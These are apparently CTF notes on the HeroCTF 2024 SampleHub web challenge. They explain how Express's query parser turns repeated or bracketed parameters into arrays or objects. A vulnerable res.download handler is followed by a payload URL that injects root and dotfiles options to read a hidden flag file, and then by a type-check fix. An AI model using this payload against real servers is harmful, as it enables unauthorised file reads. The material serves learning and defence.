Express req.query Notes
Notes from HeroCTF 2024 SampleHub [WEB].
Given this code snippet:
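const express = require("express");
const path = require("path");
const app = express();

// Serve files relative to the samples directory.
process.chdir(path.join(__dirname, "samples"));

app.get("/download/:file", (req, res) => {
  const file = path.basename(req.params.file);
  console.log(typeof req.query.filename);
  // req.query.filename is passed through without a type check.
  res.download(file, req.query.filename || "sample.png", (err) => {
    if (err) {
      res.status(404).send(`File "${file}" not found`);
    }
  });
});

typeof req.query.filename is string if the request is something like: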
http://localhost:3000/download/whatever?filename=first
But typeof req.query.filename is object if the request is something like:
http://localhost:3000/download/whatever?filename=first&filename=second
We can also inject object properties like this:
http://localhost:3000/download/.flag.txt?filename[root]=/&filename[dotfiles]=allow
The type of req.query.filename will also be object with something like:
filename[whatever]
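A type check that closes this off, as an added example (not code from the challenge or from Express): the handler accepts `filename` only when it is a single string, so the array and object forms shown above never reach `res.download`. `SAMPLE_QUERIES`, `downloadName`, `handleDownload` and `runSamples` are hypothetical names, and the sample query objects are constructed to mirror what the parser yields for the URLs above.

```javascript
// Constructed samples: the parsed req.query for each URL form in these notes.
const SAMPLE_QUERIES = {
  single:   { filename: "first" },                          // ?filename=first
  repeated: { filename: ["first", "second"] },              // ?filename=first&filename=second
  nested:   { filename: { root: "/", dotfiles: "allow" } }, // ?filename[root]=/&filename[dotfiles]=allow
  missing:  {},                                             // no filename parameter
};

// Hypothetical helper: return a usable download name, the fallback when the
// parameter is absent or empty, or null when the value must be rejected.
function downloadName(value, fallback) {
  if (value === undefined || value === "") return fallback;
  // Arrays and objects both fail this check, whatever keys they carry.
  if (typeof value !== "string") return null;
  // Keep it a bare file name: no path separators, no control characters.
  if (/[\/\\\x00-\x1f]/.test(value)) return null;
  return value;
}

// Hypothetical handler body. `send` stands in for res.download so the check
// can be exercised without a running server.
function handleDownload(query, send) {
  const name = downloadName(query.filename, "sample.png");
  if (name === null) {
    return { status: 400, body: "filename must be a single string" };
  }
  send(name); // only ever called with a string
  return { status: 200, body: name };
}

// Run every constructed sample and record the status and number of sends.
function runSamples() {
  const results = {};
  for (const [label, query] of Object.entries(SAMPLE_QUERIES)) {
    const sent = [];
    const res = handleDownload(query, (name) => sent.push(name));
    results[label] = { status: res.status, sent: sent.length };
  }
  return results;
}

console.log(runSamples());
```

In a real route the same check goes before the `res.download` call. Setting `app.set("query parser", "simple")` stops bracket keys from becoming nested objects, but repeated keys still arrive as arrays, so the type check is still needed.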
express-query-param.txt · Last modified: 2024/11/01 09:07 by osorin